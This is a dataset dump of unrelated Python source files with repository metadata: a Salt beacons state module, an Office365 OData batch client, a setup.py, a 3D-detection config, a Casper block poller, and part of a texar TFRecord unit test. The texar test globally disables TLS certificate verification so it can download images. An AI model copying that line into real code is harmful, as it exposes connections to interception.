ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
| true
| true
|
f707986dc8a90584a7e3d4ebd3b0ed227a87eafe
| 5,499
|
py
|
Python
|
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
office365/runtime/odata/odata_batch_request.py
|
andrewcchoi/Office365-REST-Python-Client
|
43db12ae532c804c75a3a34f7b0d7d79e30fdac3
|
[
"MIT"
] | null | null | null |
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
"""
        :type query: office365.runtime.queries.batch_query.BatchQuery
"""
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
"""Parses an HTTP response.
:type response: requests.Response
        :type query: office365.runtime.queries.batch_query.BatchQuery
"""
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
"""Parses a multipart/mixed response body from from the position defined by the context.
:type response: requests.Response
"""
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
message = message_from_bytes(http_body) # type: Message
for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
"""Serializes a batch request body.
:type query BatchQuery
"""
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
# validate for errors
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
"""Serializes a part of a batch request to a string. A part can be either a GET request or
a change set grouping several CUD (create, update, delete) requests.
:type request: RequestOptions
"""
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
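# Usage sketch (hypothetical names; the exact BatchQuery construction comes
# from the surrounding library): build_request() above produces a POST to
# <service_root>/$batch whose multipart/mixed body holds one
# application/http part per queued query, e.g.
#
#   batch = BatchQuery(context)
#   request = ODataBatchRequest(context).build_request(batch)
#   # request.data then begins with something like:
#   #   --batch_<uuid>
#   #   Content-Type: application/http
#   #   Content-Transfer-Encoding: binary
#   #   GET <service_root>/<resource> HTTP/1.1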
| 36.90604
| 98
| 0.62084
|
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
        message = message_from_bytes(http_body)
        for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
| true
| true
|
f707990f74ebda389b8ac9fa17579186b3bc2ac7
| 1,945
|
py
|
Python
|
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | 1
|
2019-05-26T15:10:26.000Z
|
2019-05-26T15:10:26.000Z
|
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | null | null | null |
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
# From here: http://pytest.org/2.2.4/goodpractises.html
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
# Import here, because outside the eggs aren't loaded.
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
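# Worked example of the parse above: if streamy.py contains the line
#   __version__ = '1.0.3'
# then line.strip().split()[-1] is "'1.0.3'" and .strip("'") removes the
# quotes, so _version() returns 1.0.3.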
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
| 30.390625
| 80
| 0.598458
|
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
| true
| true
|
f7079b75ade620f03f918b382e39e44f8ce865cd
| 3,491
|
py
|
Python
|
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
# model training and testing settings
train_cfg=dict(
assigner=[
dict( # for Pedestrian
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Cyclist
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Car
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
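# Shape sanity check, derived from the values above:
#   x: (70.4 - 0)   / 0.05 = 1408 voxels
#   y: (40 - (-40)) / 0.05 = 1600 voxels
#   z: (1 - (-3))   / 0.1  = 40 voxels, +1 padding -> sparse_shape [41, 1600, 1408]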
| 40.126437
| 66
| 0.42452
|
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
train_cfg=dict(
assigner=[
            dict(type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
            dict(type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
            dict(type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
| true
| true
|
f7079bdf572c6fb25d68de3ac7e2a061d2d86ca1
| 761
|
py
|
Python
|
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | 2
|
2021-04-14T13:49:20.000Z
|
2021-07-06T22:07:02.000Z
|
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | null | null | null |
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | 1
|
2021-04-15T12:52:42.000Z
|
2021-04-15T12:52:42.000Z
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
"""Returns last finialised block in current era.
:param polling_interval_seconds: Time interval time (in seconds) before polling for next switch block.
:param max_polling_time_seconds: Maximum time in seconds to poll.
:returns: On-chain block information.
"""
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
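# Usage sketch (assumes a reachable node behind get_block); note that if no
# switch block is seen within max_polling_time_seconds, the loop falls
# through and the function implicitly returns None:
#
#   block = execute(polling_interval_seconds=2.0, max_polling_time_seconds=60.0)
#   if block is not None:
#       print(block["header"]["era_end"])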
| 26.241379
| 106
| 0.678055
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
| true
| true
|
f7079e13e136fd4466c5ea492de342e7668711ba
| 9,382
|
py
|
Python
|
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | 1
|
2019-08-14T02:54:45.000Z
|
2019-08-14T02:54:45.000Z
|
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | null | null | null |
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
"""
Unit tests for data related operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
"""Tests tfrecord data class.
"""
# pylint: disable=too-many-locals
def setUp(self):
tf.test.TestCase.setUp(self)
# Create test data
# pylint: disable=no-member
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
"""Returns a bytes_list from a string / byte.
"""
# pylint: disable=undefined-loop-variable
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
"""Returns an int64_list from a bool / enum / int / uint.
"""
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
"""Create data example with image
"""
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
# Prepare Validation data
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
#_construct_dataset_valid("", shape, label)
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
"""Remove the downloaded files after the test
"""
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
# Construct database
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
# Run the logics
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
# Check data consistency
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
# Check data type conversion
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
# Check image decoding and resize
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
"""Tests the logics of TFRecordData.
"""
self._run_and_test(self._hparams)
def test_image_resize(self):
"""Tests the image resize function
"""
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
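# Reproduction note (TF 1.x APIs such as make_initializable_iterator are
# assumed): 'shape' is declared as a VarLenFeature above, so it is parsed
# into a sparse tensor, which is why the assertions read
# data_batch_['shape'].values rather than a dense array directly.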
| 37.983806
| 79
| 0.513537
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
def setUp(self):
tf.test.TestCase.setUp(self)
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
